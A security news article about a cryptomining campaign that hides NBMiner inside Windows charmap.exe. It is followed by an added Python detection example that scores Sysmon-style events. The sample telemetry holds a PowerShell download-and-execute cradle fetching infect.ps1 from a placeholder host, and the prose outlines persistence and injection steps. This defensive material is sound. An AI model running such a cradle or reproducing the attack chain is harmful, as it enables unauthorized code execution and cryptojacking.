Security teams are raising the alarm over a new cryptomining malware campaign that takes an unusual route to stay hidden: it runs inside the Windows Character Map application (charmap.exe).
Researchers say the technique makes the attack far harder to detect, since the malicious miner operates from a trusted Microsoft process instead of a suspicious standalone file.
How the Attack Starts
The attack chain begins with a simple but dangerous move. A compromised workstation reaches out to an obscure external server and quietly downloads a PowerShell script named infect.ps1.
Darktrace analysts spotted this behavior after noticing a new PowerShell user agent fingerprint, which immediately raised red flags. Once executed, the script unpacks several encoded blobs of data, reconstructs an AutoIt binary, and plants it in the user’s AppData folder. To make sure it survives reboots, the malware adds a shortcut in the startup directory.

Stealthy Tricks at Every Stage
This isn’t a run-of-the-mill cryptojacker. The threat actor has built in multiple evasion layers to avoid common defenses:
- Runs entirely in memory, leaving little behind on disk.
- Uses UAC bypass techniques to escalate privileges.
- Leverages registry checks to blend in with normal Windows activity.
- Injects itself into charmap.exe, a program no one would expect to host malicious code.
By piggybacking on charmap.exe, the malware slips past Windows Defender’s signature checks, keeping mining operations under the radar.
The Payload: NBMiner
Once inside, the malware launches NBMiner, a well-known crypto mining tool, tuned for the KawPoW algorithm.
It then connects to external mining pools like ravenminer.com and other suspicious endpoints. For victims, the signs aren’t subtle: systems slow down, CPU usage spikes, and electricity bills climb — all without obvious clues pointing to malware.

Why This Attack Matters
This campaign highlights how far cryptojacking tactics have come. Instead of dropping noisy files on disk, the attacker chains together PowerShell, AutoIt, persistence tricks, and legitimate process injection.
The result is a fileless, persistent miner that’s much harder for traditional antivirus to catch.
What Security Teams Should Do
- Watch for unusual PowerShell behavior and strange user agents.
- Investigate spikes in CPU usage or power costs that can’t be explained.
- Deploy behavioral monitoring tools that go beyond signature scans.
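The recommendations above translate directly into behavioral rules. The following is an added example (not code from the article or from Darktrace) that scores constructed Sysmon-style events against the stages described in the article: a PowerShell download of a .ps1 script, a shortcut dropped into the Startup folder, charmap.exe spawned from AppData, and charmap.exe making outbound connections. The Event fields, the sample paths, the user name and the placeholder URL are assumptions; only ravenminer.com comes from the article.

```python
from dataclasses import dataclass

@dataclass
class Event:
    """Minimal Sysmon-style record: 1=ProcessCreate, 3=NetworkConnect, 11=FileCreate."""
    event_id: int
    image: str
    parent: str = ""
    cmdline: str = ""
    dest_host: str = ""
    target_file: str = ""

def _base(path):
    return path.rsplit("\\", 1)[-1].lower()

MINING_POOLS = {"ravenminer.com"}  # domain named in the article; extend from threat intel

def detect(events):
    """Return (rule, image) tuples for events that match the campaign's behaviours."""
    hits = []
    for e in events:
        img, cmd = _base(e.image), e.cmdline.lower()
        # 1. PowerShell pulling a .ps1 from the network (the infect.ps1 stage)
        if e.event_id == 1 and img == "powershell.exe" and ".ps1" in cmd and \
                any(k in cmd for k in ("downloadstring", "downloadfile", "invoke-webrequest")):
            hits.append(("powershell_download_cradle", e.image))
        # 2. Shortcut dropped into the Startup folder (reboot persistence)
        tf = e.target_file.lower()
        if e.event_id == 11 and "\\start menu\\programs\\startup\\" in tf and tf.endswith(".lnk"):
            hits.append(("startup_folder_persistence", e.image))
        # 3. charmap.exe launched by something living in AppData (injection host setup)
        if e.event_id == 1 and img == "charmap.exe" and "\\appdata\\" in e.parent.lower():
            hits.append(("charmap_spawned_from_appdata", e.image))
        # 4. charmap.exe has no business talking to the network at all
        if e.event_id == 3 and img == "charmap.exe":
            pool = any(e.dest_host.lower().endswith(p) for p in MINING_POOLS)
            hits.append(("charmap_to_known_mining_pool" if pool else "charmap_outbound_connection", e.image))
    return hits

# Constructed sample telemetry (hostnames, paths and user are placeholders, not real IoCs).
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    Event(1, PS, parent=r"C:\Windows\explorer.exe",
          cmdline="powershell -c IEX (New-Object Net.WebClient).DownloadString('http://placeholder.invalid/infect.ps1')"),
    Event(11, PS, target_file=r"C:\Users\alice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.lnk"),
    Event(1, r"C:\Windows\System32\charmap.exe", parent=r"C:\Users\alice\AppData\Roaming\svc\autoit3.exe"),
    Event(3, r"C:\Windows\System32\charmap.exe", dest_host="stratum.ravenminer.com"),
    Event(1, r"C:\Windows\System32\charmap.exe", parent=r"C:\Windows\explorer.exe"),  # benign launch
]
```

Calling detect(SAMPLE_EVENTS) flags the first four events and leaves the benign charmap.exe launch from Explorer alone; rule 4 fires on any charmap.exe network connection, pool or not, because that process should never need one.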
This isn’t just about mining coins in the background — it’s a reminder that adversaries are constantly finding new ways to exploit trusted Windows components for profit.
Final Thoughts
The abuse of Windows Character Map shows how creative attackers have become in hiding their tracks. For organizations, this incident is another wake-up call: defending against cryptomining isn’t just about blocking miners, it’s about spotting the unusual behaviors that give them away.
Source: cybersecuritynews